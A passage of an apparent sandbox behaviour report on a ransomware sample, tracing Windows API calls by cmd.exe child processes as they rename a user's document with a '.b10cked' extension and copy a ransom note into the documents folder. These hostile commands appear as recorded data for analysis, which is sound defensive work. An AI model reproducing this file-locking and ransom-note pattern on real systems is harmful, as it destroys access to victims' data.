Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.909] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.909] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.909] GetConsoleTitleW (in: lpConsoleTitle=0x808e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.910] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.910] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.910] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.910] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.910] _wcsicmp (_String1="move", _String2=")") returned 68 [0234.910] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0234.910] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0234.910] _wcsicmp (_String1="IF", _String2="move") returned -4 [0234.910] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0234.910] _wcsicmp (_String1="REM", _String2="move") returned 5 [0234.910] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0234.913] GetConsoleTitleW (in: lpConsoleTitle=0x2af5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.914] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0234.914] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0234.914] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0234.914] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0234.914] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0234.914] _wcsicmp (_String1="move", _String2="CD") returned 10 [0234.914] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0234.914] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0234.914] _wcsicmp (_String1="move", _String2="REN") returned -5 [0234.914] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0234.914] _wcsicmp (_String1="move", _String2="SET") returned -6 [0234.915] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0234.915] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0234.915] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0234.915] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0234.915] _wcsicmp (_String1="move", _String2="MD") returned 11 [0234.915] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0234.915] _wcsicmp (_String1="move", _String2="RD") returned -5 [0234.915] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0234.915] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0234.915] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0234.915] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0234.915] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0234.915] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0234.915] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0234.915] _wcsicmp (_String1="move", _String2="VER") returned -9 [0234.915] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0234.915] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0234.915] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0234.915] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0234.915] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0234.915] _wcsicmp (_String1="move", _String2="START") returned -6 [0234.915] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0234.915] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0234.915] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0234.917] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.917] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0234.917] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af394, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af38c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af38c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0234.917] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0234.918] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0234.918] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0234.918] _wcsicmp (_String1="AK_FOD~1.OTS", _String2=".") returned 51 [0234.918] _wcsicmp (_String1="AK_FOD~1.OTS", _String2="..") returned 51 [0234.918] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod~1.ots")) returned 0x20 [0234.919] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x91e58 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.919] SetErrorMode (uMode=0x0) returned 0x0 [0234.919] SetErrorMode (uMode=0x1) returned 0x0 [0234.919] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", nBufferLength=0x104, lpBuffer=0x2aed1c, lpFilePart=0x2aed04 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", lpFilePart=0x2aed04*="AK_FOD~1.OTS") returned 0x2d [0234.919] SetErrorMode (uMode=0x0) returned 0x1 [0234.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew")) returned 0x12 [0234.919] _wcsicmp (_String1="AK_FOD~1.OTS", _String2=".") returned 51 [0234.919] _wcsicmp (_String1="AK_FOD~1.OTS", _String2="..") returned 51 [0234.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod~1.ots")) returned 0x20 [0234.919] SetErrorMode (uMode=0x0) returned 0x0 [0234.919] SetErrorMode (uMode=0x1) returned 0x0 [0234.919] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", nBufferLength=0x104, lpBuffer=0x2af198, lpFilePart=0x2aef30 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", lpFilePart=0x2aef30*="AK_FOD~1.OTS") returned 0x2d [0234.919] SetErrorMode (uMode=0x0) returned 0x1 [0234.919] SetErrorMode (uMode=0x0) returned 0x0 [0234.919] SetErrorMode (uMode=0x1) returned 0x0 [0234.919] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked", nBufferLength=0x104, lpBuffer=0x2af3a0, lpFilePart=0x2aef30 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked", lpFilePart=0x2aef30*="aK_FOd5jl.ots.b10cked") returned 0x36 [0234.919] SetErrorMode (uMode=0x0) returned 0x1 [0234.919] SetLastError (dwErrCode=0x0) [0234.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod5jl.ots.b10cked")) returned 0xffffffff [0234.919] GetLastError () returned 0x2 [0234.920] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x2ae8ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae8ac) returned 0x80e90 [0234.920] FindNextFileW (in: hFindFile=0x80e90, lpFindFileData=0x2ae8ac | out: lpFindFileData=0x2ae8ac) returned 0 [0234.920] GetLastError () returned 0x12 [0234.920] FindClose (in: hFindFile=0x80e90 | out: hFindFile=0x80e90) returned 1 [0234.921] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x91bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x91bf8) returned 0x80e90 [0234.921] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked", nBufferLength=0x104, lpBuffer=0x2aeb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked", lpFilePart=0x0) returned 0x36 [0234.921] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots", nBufferLength=0x104, lpBuffer=0x2aeb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots", lpFilePart=0x0) returned 0x2e [0234.921] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod5jl.ots")) returned 0x20 [0234.921] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod5jl.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod5jl.ots.b10cked"), dwFlags=0x3) returned 1 [0234.922] FindClose (in: hFindFile=0x80e90 | out: hFindFile=0x80e90) returned 1 [0234.922] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2aeaf8 | out: _Buffer=" 1") returned 9 [0234.922] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.922] GetFileType (hFile=0x7) returned 0x2 [0235.362] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.362] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aea84 | out: lpMode=0x2aea84) returned 1 [0235.362] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.362] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2aeab8 | out: lpConsoleScreenBufferInfo=0x2aeab8) returned 1 [0235.362] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.362] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x2aeaf8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.362] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2aeadc, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x2aeadc*=0x1a) returned 1 [0235.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.363] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.363] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.363] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.363] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.363] SetConsoleInputExeNameW () returned 0x1 [0235.363] GetConsoleOutputCP () returned 0x1b5 [0235.363] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.363] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.363] exit (_Code=0) Process: id = "632" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35008 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35009 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35010 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35011 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 35012 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35013 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35014 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35015 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35016 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 35017 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35306 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35307 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35308 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35309 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 35310 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 35311 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35312 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35313 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35314 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35315 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35316 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35317 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35318 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35319 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35320 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 35321 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35322 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35323 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35324 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35325 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35326 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35327 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 35328 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 35329 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 870 os_tid = 0xa94 [0234.849] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fadc | out: lpSystemTimeAsFileTime=0x26fadc*(dwLowDateTime=0xbf709480, dwHighDateTime=0x1d440a9)) [0234.849] GetCurrentProcessId () returned 0xac8 [0234.849] GetCurrentThreadId () returned 0xa94 [0234.849] GetTickCount () returned 0x407dc [0234.849] QueryPerformanceCounter (in: lpPerformanceCount=0x26fad4 | out: lpPerformanceCount=0x26fad4*=29163858325) returned 1 [0234.850] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.850] __set_app_type (_Type=0x1) [0234.850] __p__fmode () returned 0x76b331f4 [0234.850] __p__commode () returned 0x76b331fc [0234.850] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.850] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.850] GetCurrentThreadId () returned 0xa94 [0234.850] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa94) returned 0x38 [0234.850] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.850] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.850] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.851] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.851] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa6c | out: phkResult=0x26fa6c*=0x0) returned 0x2 [0234.851] VirtualQuery (in: lpAddress=0x26faa3, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.851] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.851] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.851] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.851] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.851] GetConsoleOutputCP () returned 0x1b5 [0234.851] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.851] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.851] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.852] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.852] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.852] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.852] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.852] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.852] GetEnvironmentStringsW () returned 0x390180* [0234.852] FreeEnvironmentStringsW (penv=0x390180) returned 1 [0234.852] GetEnvironmentStringsW () returned 0x390180* [0234.852] FreeEnvironmentStringsW (penv=0x390180) returned 1 [0234.852] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9dc | out: phkResult=0x26e9dc*=0x40) returned 0x0 [0234.852] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0xa8, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.852] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x1, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x1, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x0, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW 